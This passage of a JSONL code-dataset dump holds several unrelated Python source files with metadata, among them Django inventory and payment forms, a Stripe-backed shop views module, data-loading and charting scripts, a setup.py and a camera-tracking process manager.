'laptop_service_tag': 'Laptop Service Tag', 'laptop_asset_tag': 'Laptop Asset Tag', 'laptop_owner': 'Laptop Owner', }\n\nclass PrinterForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Printer\n\t\tfields = ['printer_manufacturer', 'printer_model', 'printer_serial_number', 'printer_asset_tag', 'printer_owner', ]\n\t\tlabels = {'printer_manufacturer': 'Printer Manufacturer', 'printer_model': 'Printer Model', 'printer_serial_number': 'Printer Serial Number', 'printer_asset_tag': 'Printer Asset Tag', 'printer_owner': 'Printer Owner',}\n\nclass BarcodeScannerForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = BarcodeScanner\n\t\tfields = ['bs_manufacturer', 'bs_model', 'bs_serial_number', 'bs_asset_tag', ]\n\t\tlabels = {'bs_manufacturer': 'BS Manufacturer', 'bs_model': 'BS Model', 'bs_serial_number': 'BS Serial Number', 'bs_asset_tag': 'BS Asset Tag', }\n\t\nclass BarcodeScannerCradleForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = BarcodeScannerCradle\n\t\tfields = ['bsc_manufacturer', 'bsc_model', 'bsc_serial_number', 'bsc_asset_tag', ]\n\t\tlabels = {'bsc_manufacturer': 'Cradle Manufacturer', 'bsc_model': 'Cradle Model', 'bsc_serial_number': 'Cradle Serial Number', 'bsc_asset_tag': 'Cradle Asset Tag', }\n\nclass ScannerForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Scanner\n\t\tfields = ['scanner_manufacturer', 'scanner_model', 'scanner_serial_number', 'scanner_asset_tag', ]\n\t\tlabels = {'scanner_manufacturer': 'Scanner Manufacturer', 'scanner_model': 'Scanner Model', 'scanner_serial_number': 'Scanner Serial Number', 'scanner_asset_tag': 'Scanner Asset Tag', }\n\t\t\nclass BiometricScannerForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = BiometricScanner\n\t\tfields = ['bis_manufacturer', 'bis_model', 'bis_serial_number', 'bis_asset_tag', ]\n\t\tlabels = {'bis_manufacturer': 'Biometric Scanner Manufacturer', 'bis_model': 'Biometric Scanner Model', 'bis_serial_number': 'Biometric Scanner Serial Number', 'bis_asset_tag': 'Biometric Scanner Asset Tag', }\n\t\t\n\t\t\n","sub_path":"inventorysite/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"166422872","text":"import pandas as pd\nimport psycopg2\nimport config\nimport datetime\nimport re\n\npd.set_option('display.height', 1000)\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\nfile_path = '/home/siem/Documents/Projects/MaketRF/СМИ. 
Упоминания персон1.xls'\ndata = pd.read_excel(file_path,sheetname='Sheet1')\n\ndef get_int(s):\n    if type(s) is int: return s\n    try:\n        result = re.sub('[^0-9]', '', s)\n    except:\n        result = s\n    return int(result)\n\ndef get_date(d):\n    if type(d) is not str: return d\n    datestring = d.split(' ')[0]\n    return datetime.datetime.strptime(datestring,\"%Y-%m-%d\")\n\nwith psycopg2.connect(**config.connection_main) as conn:\n    cur = conn.cursor()\n    for i,row in data.iterrows():\n        if pd.isnull(row['mentions']): continue\n        cur.execute('''\n            INSERT INTO smi_persons(person,date,mentions)\n            VALUES (%s,%s,%s)\n        ''', (row['person'].strip(),get_date(row['date']),get_int(row['mentions'])))\n    conn.commit()\n\n","sub_path":"load_smi_dashboard_data.py","file_name":"load_smi_dashboard_data.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"407240340","text":"import numpy as np\nimport mpl_finance as mpf\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport talib\n\n# Read the price data file\ndf = pd.read_csv('000001.SZ.csv')\n# Compute the KDJ indicator\nK, D = talib.STOCH(df['high'], df['low'], df['close'], fastk_period=9, slowk_period=3, slowd_period=3)\nJ = 3*K - 2*D\n# Visualization\nfig = plt.figure()\nax1 = fig.add_subplot(211)\nax2 = fig.add_subplot(212)\n# Draw the candlestick chart\nmpf.candlestick2_ohlc(ax1, df['open'], df['high'], df['low'], df['close'], width=0.6, colorup='red', colordown='green')\n# Draw the KDJ curves\nax2.plot(0, np.mean(K)) # align the axes of the two subplots\nax2.plot(K, label='K')\nax2.plot(D, label='D')\nax2.plot(J, label='J')\n# Show the figure\nplt.legend()\nplt.show()\n","sub_path":"LearnDay/strategy/KDJ.py","file_name":"KDJ.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"6391033","text":"#\n# MinPerimeterRectangle:\n#\n# An integer N is given, representing the area of some rectangle.\n#\n# The area of a rectangle whose sides are of length A and B is A * B,\n# and the perimeter is 2 * (A + B).\n#\n# The goal is to find the minimal perimeter of any rectangle whose\n# area equals N. 
The sides of this rectangle should be only integers.\n#\n# For example, given integer N = 30, rectangles of area 30 are:\n#\n# (1, 30), with a perimeter of 62,\n# (2, 15), with a perimeter of 34,\n# (3, 10), with a perimeter of 26,\n# (5, 6), with a perimeter of 22.\n# Write a function:\n#\n# class Solution { public int solution(int N); }\n#\n# that, given an integer N, returns the minimal perimeter of any\n# rectangle whose area is exactly equal to N.\n#\n# For example, given an integer N = 30, the function should\n# return 22, as explained above.\n#\n# Write an efficient algorithm for the following assumptions:\n# *\n# N is an integer within the range [1..1,000,000,000].\n#\nimport math\nimport sys\n\n\ndef main():\n doIt(1)\n doIt(24)\n doIt(124)\n doIt(123)\n\n\ndef doIt(N):\n out(\"Answer : {}\".format(solution(N)))\n\n\ndef out(msg):\n print(msg)\n\n\ndef solution(N):\n mx = int(math.ceil(math.sqrt(N)))\n answer = sys.maxsize\n if N % 2 == 0:\n for i in range(1, mx + 1):\n f = int(N / i)\n if f * i == N:\n a = 2 * (f + i)\n if a < answer:\n answer = a\n else:\n for i in range(1, mx + 1, 2):\n f = int(N / i)\n if f * i == N:\n a = 2 * (f + i)\n if a < answer:\n answer = a\n\n return answer\n\nmain()\n","sub_path":"C0dility/python/src/_0010_Prime_and_composite_numbers/MinPerimeterRectangle.py","file_name":"MinPerimeterRectangle.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346914224","text":"#!/usr/bin/env python\n\"\"\"\n setup.py\n\n John Eslick, Carnegie Mellon University, 2014\n\n This Material was produced under the DOE Carbon Capture Simulation\n Initiative (CCSI), and copyright is held by the software owners:\n ORISE, LANS, LLNS, LBL, PNNL, CMU, WVU, et al. The software owners\n and/or the U.S. Government retain ownership of all rights in the\n CCSI software and the copyright and patents subsisting therein. Any\n distribution or dissemination is governed under the terms and\n conditions of the CCSI Test and Evaluation License, CCSI Master\n Non-Disclosure Agreement, and the CCSI Intellectual Property\n Management Plan. No rights are granted except as expressly recited\n in one of the aforementioned agreements.\n\"\"\"\nfrom __future__ import print_function\nfrom setuptools import setup, find_packages\nimport os\n\n# Add build number file to help if BUILD_NUMBER env var is set\n# this is mostly for building on Jenkins, but you could set the\n# env var on a local setup too. 
If build number doesn't exist\n# it defaults to 0.\nbuild_name = os.environ.get('BUILD_NUMBER', '0')\n# change version.py to include the build_number\nwith open(\"foqus_lib/version/version.template\", 'r') as f:\n verfile = f.read()\nverfile = verfile.replace(\"{BUILDNUMBER}\", build_name)\nwith open(\"foqus_lib/version/version.py\", 'w') as f:\n f.write(verfile)\n#now import version.\nimport foqus_lib.version.version as ver\nprint(\"Setting version as {0}\".format(ver.version))\n\ninstall_requires=[\n 'adodbapi',\n 'TurbineClient',\n 'pyparsing',\n #'py4j',\n 'requests',\n #'networkx',\n #'redis',\n #'logstash_formatter',\n 'matplotlib',\n 'scipy',\n 'numpy',\n 'cma',\n 'pandas'],\n\n#dependency_links=[]\ndependency_links=['git+https://github.com/CCSI-Toolset/turb_client@2.0.0-alpha#egg=TurbineClient']\n\n# Set all the package parameters\npkg_name = \"foqus\"\npkg_version = ver.version\npkg_license = ver.license\npkg_description = \"FOQUS tool for simulation based optimization,\"\\\n \" uncertainty quantification, and surrogate models\"\npkg_author = ver.author\npkg_author_email = ver.support\npkg_maintainer = ver.maintainer\npkg_maintainer_email = ver.maintainer_email\npkg_url = ver.webpage\n\nsetup(\n name = pkg_name,\n version = pkg_version,\n license = pkg_license,\n description = pkg_description,\n author = pkg_author,\n author_email = pkg_author_email,\n maintainer = pkg_maintainer,\n maintainer_email = pkg_maintainer_email,\n url = pkg_url,\n packages = find_packages(),\n include_package_data=True,\n scripts = [\n 'foqus.py',\n 'icons_rc.py',\n 'foqusClient.py'],\n install_requires=install_requires,\n dependency_links=dependency_links\n)\n\nprint(\"\\n\\n\\n\")\nprint(\"==============================================================\")\nprint(\"The following packages can be installed by the user\")\nprint(\"==============================================================\")\nprint(\"PSUADE (Required for UQ features): \")\nprint(\" https://github.com/LLNL/psuade\\n\")\nprint(\"Turbine (Windows only, run Aspen, Excel, and gPROMS): \")\nprint(\" (url tbd)\\n\")\nprint(\"ALAMO (ALAMO Surogate models): \")\nprint(\" (url tbd)\\n\")\nprint(\"NLOpt Python (Additional optimization solvers):\")\nprint(\" https://nlopt.readthedocs.io/en/latest/NLopt_Installation/\\n\")\nprint(\"==============================================================\")\nprint(\"\\n\")\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"469171488","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth.models import User\nfrom .models import WithdrawalRequest\nfrom .models import Currency\n\n\nclass SendMoneyForm(forms.Form):\n recipient = forms.CharField(label=_('Recipient'), widget=forms.TextInput(\n attrs={'class': 'form-control find_user', 'placeholder': _('MI-1000000')},\n ))\n amount = forms.DecimalField(label=_('Amount'), widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': _('Amount')},\n ), decimal_places=2, max_digits=12)\n mail_key = forms.IntegerField(label=_('Code from email'), widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': _('Code from email'), 'readonly': 'true'},\n ))\n\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user', None)\n super(SendMoneyForm, self).__init__(*args, **kwargs)\n\n def clean_amount(self):\n data = 
self.cleaned_data['amount']\n amount = User.objects.select_related('profile').values('profile__bill').get(username=self.user)\n if int(data) > amount['profile__bill']:\n raise forms.ValidationError(_('Ensure this value is less than or equal to {}.'.format(amount['profile__bill'])))\n if data == 0:\n raise forms.ValidationError(_('The minimum amount for transfer must be more then 0'))\n return data\n\n def clean_recipient(self):\n data = self.cleaned_data['recipient']\n current_user = User.objects.select_related('profile').get(username=self.user)\n\n try:\n recipient = User.objects.select_related('profile').get(profile__unique_number=data)\n except User.DoesNotExist:\n recipient = None\n\n if str(data) == str(current_user.profile.unique_number):\n raise forms.ValidationError('Самому себе переводить средства запрещенно')\n elif recipient is None:\n raise forms.ValidationError('Получателя не существует')\n return data\n\n\nclass WithdrawalRequestForm(forms.ModelForm):\n\n class Meta:\n model = WithdrawalRequest\n fields = ('amount', 'currency', 'payment_system', 'account_number',)\n\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user', None)\n super(WithdrawalRequestForm, self).__init__(*args, **kwargs)\n self.fields['currency'].queryset = Currency.objects.filter(active=True)\n\n def clean_amount(self):\n amount = self.cleaned_data['amount']\n if int(amount) < 100:\n raise forms.ValidationError('Сумма для снятия должна быть больше 100')\n if int(amount) > self.user.profile.bill:\n raise forms.ValidationError('У Вас недостаточно средств')\n\n return amount\n","sub_path":"finance/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"212450320","text":"from django.conf import settings\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom .models import Item, OrderItem, Order, BillingAddress, Payment, Coupon, Refund\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nimport logging\nfrom .forms import CheckoutForm, CouponForm, RefundForm\nfrom django.views.generic import View, ListView, DetailView\n\nimport random\nimport string\nimport stripe\nstripe.api_key = settings.STRIPE_SECRET_KEY\n\n\n\n\n\n# Create your views here.\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_ref_code():\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=20))\n\ndef products(request):\n context = {\n 'items': Item.objects.all()\n }\n return render(request, \"product.html\", context)\n\n\nclass CheckoutView(View):\n\n def get(self, *args, **kwargs):\n try:\n order = Order.objects.get(user=self.request.user, ordered=False)\n form = CheckoutForm()\n context = {\n 'form' : form,\n 'couponform' : CouponForm(),\n 'order':order,\n 'DISPLAY_COUPON_FORM' : True\n\n }\n return render(self.request, \"checkout.html\", context)\n except ObjectDoesNotExist:\n messages.info(self.request, \"You do not have a active order\")\n return redirect('core:checkout')\n\n \n def post(self, *args, **kwargs):\n form = CheckoutForm(self.request.POST or None)\n try:\n order = Order.objects.get(user=self.request.user, ordered=False)\n logging.error(\"%s\",form.is_valid())\n if form.is_valid():\n street_address = form.cleaned_data.get('street_address')\n apartment_address = 
form.cleaned_data.get('apartment_address')\n country = form.cleaned_data.get('country')\n zip = form.cleaned_data.get('zip')\n same_shipping_address = form.cleaned_data.get('same_shipping_address')\n save_info = form.cleaned_data.get('save_info')\n payment_option = form.cleaned_data.get('payment_option')\n billing_address = BillingAddress(\n user=self.request.user,\n street_address = street_address,\n apartment_address = apartment_address,\n country = country,\n zip = zip)\n billing_address.save()\n order.billing_address = billing_address\n order.save()\n\n if payment_option == 'S':\n return redirect('core:payment', payment_option='stripe')\n elif payment_option == 'P':\n return redirect('core:payment', payment_option='paypal')\n else:\n messages.warning(self.request, \"Invalid payment option selected\")\n return redirect('core:checkout')\n except ObjectDoesNotExist:\n messages.warning(self.request, \"you do not have an active order\")\n return redirect('core:order-summary')\n\n\nclass PaymentView(View):\n\n def get(self, *args, **kwargs):\n order = Order.objects.get(user=self.request.user, ordered=False)\n if order.billing_address:\n context = {\n 'order':order,\n 'DISPLAY_COUPON_FORM' : False\n }\n return render(self.request, \"payment.html\", context)\n else:\n messages.warning(self.request, \"you have not added a billing address\")\n return redirect('core:checkout')\n\n\n\n def post(self, *args, **kwargs):\n order = Order.objects.get(user=self.request.user, ordered=False)\n token = self.request.POST.get('stripeToken')\n amount = int(order.get_total() * 100)\n print(amount)\n\n try:\n # Use Stripe's library to make requests...\n charge = stripe.Charge.create(\n\n shipping={\n 'name': 'Jenny Rosen',\n 'address': {\n 'line1': '510 Townsend St',\n 'postal_code': '98140',\n 'city': 'San Francisco',\n 'state': 'CA',\n 'country': 'US',\n },\n },\n amount=amount,\n currency=\"usd\",\n source=token,\n description=\"My First Test Charge (created for API docs)\"\n )\n\n \n\n\n\n #create the paymment\n payment = Payment()\n payment.stripe_charge_id = charge['id']\n payment.user = self.request.user\n payment.amount = order.get_total()\n payment.save()\n\n\n\n # assign payment to the order\n order_items = order.items.all()\n order_items.update(ordered=True)\n for item in order_items:\n item.save()\n\n order.ordered = True\n order.payment = payment\n order.ref_code = create_ref_code()\n order.save()\n\n messages.success(self.request, \"Your order was successfull\")\n return redirect(\"/\")\n\n except stripe.error.CardError as e:\n # Since it's a decline, stripe.error.CardError will be caught\n body = e.json_body()\n err = body.get('error', {})\n messages.warning(self.request, f\"{err.get('message')}\")\n return redirect(\"/\")\n\n\n except stripe.error.RateLimitError as e:\n # Too many requests made to the API too quickly\n messages.warning(self.request, \"Rate limited error\")\n return redirect(\"/\")\n \n except stripe.error.InvalidRequestError as e:\n # Invalid parameters were supplied to Stripe's API\n print('Status is: %s' % e.http_status)\n print('Type is: %s' % e.error.type)\n print('Code is: %s' % e.error.code)\n # param is '' in this case\n print('Param is: %s' % e.error.param)\n print('Message is: %s' % e.error.message) \n messages.warning(self.request, \"Invalid parameters\")\n return redirect(\"/\")\n\n except stripe.error.AuthenticationError as e:\n # Authentication with Stripe's API failed\n # (maybe you changed API keys recently)\n messages.warning(self.request, \"Not 
authenticated\")\n            return redirect(\"/\")\n\n        except stripe.error.APIConnectionError as e:\n            # Network communication with Stripe failed\n            messages.warning(self.request, \"Network error\")\n            return redirect(\"/\")\n\n        except stripe.error.StripeError as e:\n            # Display a very generic error to the user, and maybe send\n            # yourself an email\n            messages.warning(self.request, \"Something went wrong. You were not charged. Please try again\")\n            return redirect(\"/\")\n\n        except Exception as e:\n            # Something else happened, completely unrelated to Stripe;\n            # a generic exception has none of Stripe's http_status/error attributes\n            print('Error is: %s' % e)\n            messages.warning(self.request, \"A serious error occurred. You were not charged\")\n            return redirect(\"/\")\n\n\nclass HomeView(ListView):\n    model = Item\n    paginate_by = 10\n    ordering = ['slug']\n    template_name = \"home.html\"\n\ndef home(request):\n    context = {\n        'items': Item.objects.all()\n    }\n    return render(request, \"home.html\", context)\n\nclass OrderSummaryView(LoginRequiredMixin, View):\n    def get(self, *args, **kwargs):\n\n        try:\n            order = Order.objects.get(user=self.request.user, ordered=False)\n            context = {\n                'object': order\n            }\n            return render(self.request, \"order_summary.html\", context)\n        except ObjectDoesNotExist:\n            messages.warning(self.request, \"You do not have an active order\")\n            return redirect(\"/\")\n\nclass ItemDetailView(DetailView):\n    model = Item\n    template_name = \"product.html\"\n\n@login_required\ndef add_to_cart(request, slug):\n    item = get_object_or_404(Item, slug=slug)\n    order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)\n    order_qs = Order.objects.filter(user=request.user, ordered=False)\n    if order_qs.exists():\n        order = order_qs[0]\n        logging.error(\"%s\", order_qs)\n        logging.error(\"%s\", order.items.filter(item__slug=item.slug))\n        if order.items.filter(item__slug=item.slug).exists():\n            order_item.quantity +=1\n            order_item.save()\n            messages.info(request, \"This item quantity was updated\")\n            return redirect('core:order-summary')\n        else:\n            order.items.add(order_item)\n            messages.info(request, \"This item was added to your cart\")\n            return redirect('core:order-summary')\n\n    else:\n        ordered_date = timezone.now()\n        order = Order.objects.create(user=request.user, ordered_date=ordered_date)\n        order.items.add(order_item)\n        messages.info(request, \"This item was added to your cart\")\n        return redirect('core:order-summary')\n\n\n@login_required\ndef remove_from_cart(request, slug):\n    item = get_object_or_404(Item, slug=slug)\n    order_qs = Order.objects.filter(user=request.user, ordered=False)\n    if order_qs.exists():\n        order = order_qs[0]\n        if order.items.filter(item__slug=item.slug).exists():\n            order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)\n\n            order.items.remove(order_item)\n            order_item.delete()\n            messages.info(request, \"This item was removed from your cart\")\n            return redirect('core:order-summary')\n        else:\n            messages.info(request, \"This item was not in your cart\")\n            return redirect('core:product', slug=slug)\n    else:\n        messages.info(request, \"You do not have an active cart\")\n        return redirect('core:product', slug=slug)\n\n\n@login_required\ndef remove_single_item_from_cart(request, slug):\n    item = get_object_or_404(Item, slug=slug)\n    order_qs = Order.objects.filter(user=request.user, ordered=False)\n    if order_qs.exists():\n        
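# the user already has an open (unordered) cart: fetch it and decrement\n        # this item, removing it from the cart entirely once its quantity reaches one\n        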
order = order_qs[0]\n        if order.items.filter(item__slug=item.slug).exists():\n            order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)\n            if order_item.quantity > 1:\n                order_item.quantity -=1\n                order_item.save()\n            else:\n                order.items.remove(order_item)\n            messages.info(request, \"This item was updated\")\n            return redirect('core:order-summary')\n        else:\n            messages.info(request, \"This item was not in your cart\")\n            return redirect('core:product', slug=slug)\n\n    else:\n        messages.info(request, \"You do not have an active cart\")\n        return redirect('core:product', slug=slug)\n\n    return redirect('core:product', slug=slug)\n\n\ndef get_coupon(request, code):\n    try:\n        coupon = Coupon.objects.get(code=code)\n        return coupon\n    except ObjectDoesNotExist:\n        messages.info(request, \"This coupon does not exist\")\n        return redirect(\"core:checkout\")\n\n\nclass AddCouponView(View):\n    def post(self, *args, **kwargs):\n        form = CouponForm(self.request.POST or None)\n        if form.is_valid():\n            try:\n                code = form.cleaned_data.get('code')\n                order = Order.objects.get(user=self.request.user, ordered=False)\n                order.coupon = get_coupon(self.request, code)\n                order.save()\n\n                messages.info(self.request, \"Successfully added the coupon\")\n                return redirect('core:checkout')\n            except ObjectDoesNotExist:\n                messages.info(self.request, \"You do not have an active order\")\n                return redirect('core:checkout')\n        return redirect('core:checkout')\n\n    \nclass RequestRefundView(View):\n\n    def get(self, *args, **kwargs):\n        form = RefundForm()\n        context = {\n            'form':form\n        }\n        return render(self.request, \"request_refund.html\", context)\n\n\n    def post(self, *args, **kwargs):\n        form = RefundForm(self.request.POST)\n        if form.is_valid():\n            ref_code = form.cleaned_data.get('ref_code')\n            message = form.cleaned_data.get('message')\n            email = form.cleaned_data.get('email')\n\n\n            # edit the order\n            try:\n                order = Order.objects.get(ref_code=ref_code)\n                order.refund_requested = True\n                order.save()\n\n                # store the refund\n                refund = Refund()\n                refund.order = order\n                refund.reason = message\n                refund.email = email\n                refund.save()\n                messages.info(self.request, \"Your request was received\")\n                return redirect(\"core:request-refund\")\n            except ObjectDoesNotExist:\n                messages.info(self.request, \"This order does not exist\")\n                return redirect(\"core:request-refund\")\n        return redirect(\"core:request-refund\")","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"64963193","text":"\"\"\"Handles the camera processing.\"\"\"\n\nimport multiprocessing\nimport asyncio\nfrom concurrent.futures import ProcessPoolExecutor\nimport cv2\nfrom .camera import Camera\nfrom .yolo_people_detector import YoloPeopleDetector\nfrom .hog_people_detector import HogPeopleDetector\nfrom .hog_grayscale_people_detector import HogGrayscalePeopleDetector\nfrom .motion_people_detector import MotionPeopleDetector\n\n\nDEFAULT_DETECTOR = 'yolo'\nDETECTORS = {\n    'yolo': YoloPeopleDetector,\n    'hog': HogPeopleDetector,\n    'hog_gray': HogGrayscalePeopleDetector,\n    'motion': MotionPeopleDetector,\n}\nDEFAULT_PEOPLE_GROUP = 'average'\nPEOPLE_GROUPS = ['average', 'track']\n\n\ndef start_camera(frame_queue, frame_result_queue, return_frame, detection_active,\n                 camera_calibration_requests, camera_calibration_responses) -> None:\n    \"\"\"Starts the camera in a subprocess.\"\"\"\n    camera = Camera(frame_queue, frame_result_queue, return_frame, detection_active,\n                    camera_calibration_requests, 
camera_calibration_responses)\n camera.process()\n\n\ndef start_detector(frame_queue, frame_result_queue, return_frame, coordinate_queue,\n detector_algorithm, people_group) -> None:\n \"\"\"Starts the people detector in a subprocess.\"\"\"\n detector = None\n\n if detector_algorithm not in DETECTORS:\n raise RuntimeError('Unknown detection algorithm: {}'.format(detector_algorithm))\n\n if people_group not in PEOPLE_GROUPS:\n raise RuntimeError('Unknown people group algorithm: {}'.format(people_group))\n\n detector = DETECTORS[detector_algorithm](frame_queue, frame_result_queue, return_frame,\n coordinate_queue, people_group)\n detector.process()\n\n\nclass TrackingManager:\n \"\"\"The tracking manager can start or stop the camera tracking and forward callbacks.\"\"\"\n\n def __init__(self, config):\n self.config = config\n self.camera_process = None\n self.detector_process = None\n self.detector = DEFAULT_DETECTOR\n self.people_group = DEFAULT_PEOPLE_GROUP\n self.on_frame = None\n self.config.setting_repository.register_listener(self.on_settings_changed)\n self.previous_config_value = self.config.balance\n self.camera_listeners = 0\n self.cluster_slave = None\n\n manager = multiprocessing.Manager()\n self.frame_queue = manager.Queue()\n self.frame_result_queue = manager.Queue()\n self.camera_calibration_requests = manager.Queue()\n self.camera_calibration_responses = manager.Queue()\n self.coordinate_queue = manager.Queue()\n self.detection_active = manager.Event()\n self.return_frame = manager.Event()\n\n async def on_settings_changed(self) -> None:\n \"\"\"Update the tracking status when the settings have changed.\"\"\"\n if self.config.balance and self.config.balance != self.previous_config_value:\n self.acquire_camera()\n self.start_detector()\n elif self.config.balance is False and self.config.balance != self.previous_config_value:\n self.release_camera()\n self.stop_detector()\n\n self.previous_config_value = self.config.balance\n\n def is_camera_active(self) -> bool:\n \"\"\"Returns whether the camera is active.\n\n :returns: True if the camera is active\n :rtype: bool\n \"\"\"\n return self.camera_process is not None\n\n def acquire_camera(self) -> None:\n \"\"\"Ensures the tracking is running.\"\"\"\n if self.camera_process is None:\n self.start_camera()\n\n self.camera_listeners += 1\n print('[Tracking] Camera acquired ({})'.format(self.camera_listeners))\n\n def release_camera(self) -> None:\n \"\"\"Releases the camera and stops it if no other listeners are connected.\"\"\"\n self.camera_listeners -= 1\n print('[Tracking] Camera released ({})'.format(self.camera_listeners))\n\n if self.camera_listeners == 0:\n self.stop_camera()\n\n def start_camera(self) -> None:\n \"\"\"Start the camera tracking.\"\"\"\n if self.camera_process is None:\n print('[Tracking] Starting camera')\n self.camera_process = multiprocessing.Process(\n target=start_camera, args=(self.frame_queue, self.frame_result_queue,\n self.return_frame, self.detection_active,\n self.camera_calibration_requests,\n self.camera_calibration_responses, ))\n self.camera_process.start()\n\n def start_detector(self) -> None:\n \"\"\"Start the people detector.\"\"\"\n if self.detector_process is None:\n print('[Tracking] Starting people detector: {}, {}'.format(self.detector,\n self.people_group))\n self.detection_active.set()\n self.detector_process = multiprocessing.Process(\n target=start_detector, args=(self.frame_queue, self.frame_result_queue,\n self.return_frame, self.coordinate_queue,\n self.detector, 
self.people_group, ))\n self.detector_process.start()\n\n def stop_camera(self) -> None:\n \"\"\"Stop the current camera tracking.\"\"\"\n if self.camera_process is not None:\n print('[Tracking] Stopping camera')\n self.camera_process.kill()\n self.camera_process = None\n\n def stop_detector(self) -> None:\n \"\"\"Stop the people detector.\"\"\"\n if self.detector_process is not None:\n print('[Tracking] Stopping people detector')\n self.detection_active.clear()\n self.detector_process.kill()\n self.detector_process = None\n\n async def await_frames(self) -> None:\n \"\"\"Awaits result frames and passes them to the listener.\"\"\"\n executor = ProcessPoolExecutor(max_workers=1)\n loop = asyncio.get_running_loop()\n\n while True:\n frame = await loop.run_in_executor(executor, self.frame_result_queue.get)\n if self.on_frame is not None:\n # convert frame to jpeg\n try:\n if frame is None:\n self.on_frame(None)\n else:\n _, jpeg_frame = cv2.imencode('.jpg', frame)\n self.on_frame(jpeg_frame)\n except TypeError:\n self.on_frame = None\n print('Error occurred in the on_frame callback, it will automatically get '\n + 'unregistered')\n\n async def await_coordinates(self) -> None:\n \"\"\"Awaits coordinates and passes them to the repository.\"\"\"\n executor = ProcessPoolExecutor(max_workers=1)\n loop = asyncio.get_running_loop()\n\n while True:\n coordinate = await loop.run_in_executor(executor, self.coordinate_queue.get)\n await self.config.tracking_repository.update_coordinate(coordinate)\n\n async def await_camera_calibration_responses(self) -> None:\n \"\"\"Awaits camera calibration responses and passes them to the cluster slave.\"\"\"\n executor = ProcessPoolExecutor(max_workers=1)\n loop = asyncio.get_running_loop()\n\n while True:\n count, image = await loop.run_in_executor(executor,\n self.camera_calibration_responses.get)\n if self.cluster_slave is not None:\n self.cluster_slave.send_camera_calibration_response(count, image)\n\n def set_frame_callback(self, on_frame: callable) -> None:\n \"\"\"Sets the `on_frame` callback that will receive every processed frame.\n If the tracking is not started, a RuntimeError will be raised.\n\n :param callable on_frame: Callback that receives the `numpy.ndarray` frame as the first\n argument\n \"\"\"\n self.on_frame = on_frame\n\n if self.on_frame is not None:\n self.return_frame.set()\n else:\n self.return_frame.clear()\n\n def send_camera_calibration_request(self, start: bool, finish: bool, repeat: bool,\n cluster_slave) -> None:\n \"\"\"Sends a camera calibration request to the camera process.\n\n :param bool start: If true, a new calibration will be started\n :param bool finish: If true, the current calibration will be finished\n :param bool repeat: If true, the current step will be repeated\n \"\"\"\n self.cluster_slave = cluster_slave\n self.camera_calibration_requests.put_nowait((start, finish, repeat))\n\n def set_detector(self, detector: str) -> None:\n \"\"\"Sets the detection algorithm.\n\n :param str detector: New detection algorithm\n \"\"\"\n if self.detector != detector:\n self.detector = detector\n\n if self.detector_process is not None:\n self.stop_detector()\n self.start_detector()\n\n def set_people_group(self, people_group: str) -> None:\n \"\"\"Sets the algorithm used to calculate the coordinate in case of multiple people detected.\n\n :param str people_group: New people group algorithm\n \"\"\"\n if self.people_group != people_group:\n self.people_group = people_group\n\n if self.detector_process is not None:\n 
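# restart the running detector so the new grouping strategy takes effect\n                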
self.stop_detector()\n                self.start_detector()\n","sub_path":"backend/src/tracking/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":9580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"313918849","text":"from django.conf.urls import url\r\nfrom . import views\r\n\r\nurlpatterns=[\r\n\turl(r'^create/$',views.order_create,name='order_create'),\r\n\turl(r'^admin/order/(?P<order_id>\d+)/$',views.admin_order_detail,name='admin_order_detail'),\r\n\turl(r'^orderlist/$',views.order_list,name='order_list'),\r\n\turl(r'^(?P<order_id>\d+)/$',views.order_detail,name='order_detail'),\r\n\turl(r'^verify/(?P<order_id>\d+)/$',views.VerifyOrder,name='verify'),\r\n\turl(r'^repay/(?P<order_id>\d+)/$',views.repay,name='repay'),\r\n]","sub_path":"September/orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"570771169","text":"from zope.interface import implements\nfrom zope.schema import Int, Choice, TextLine, Date, List, Bool\nfrom zope.schema.vocabulary import SimpleVocabulary, SimpleTerm\nfrom plone.app.users.userdataschema import IUserDataSchemaProvider\nfrom plone.app.users.userdataschema import 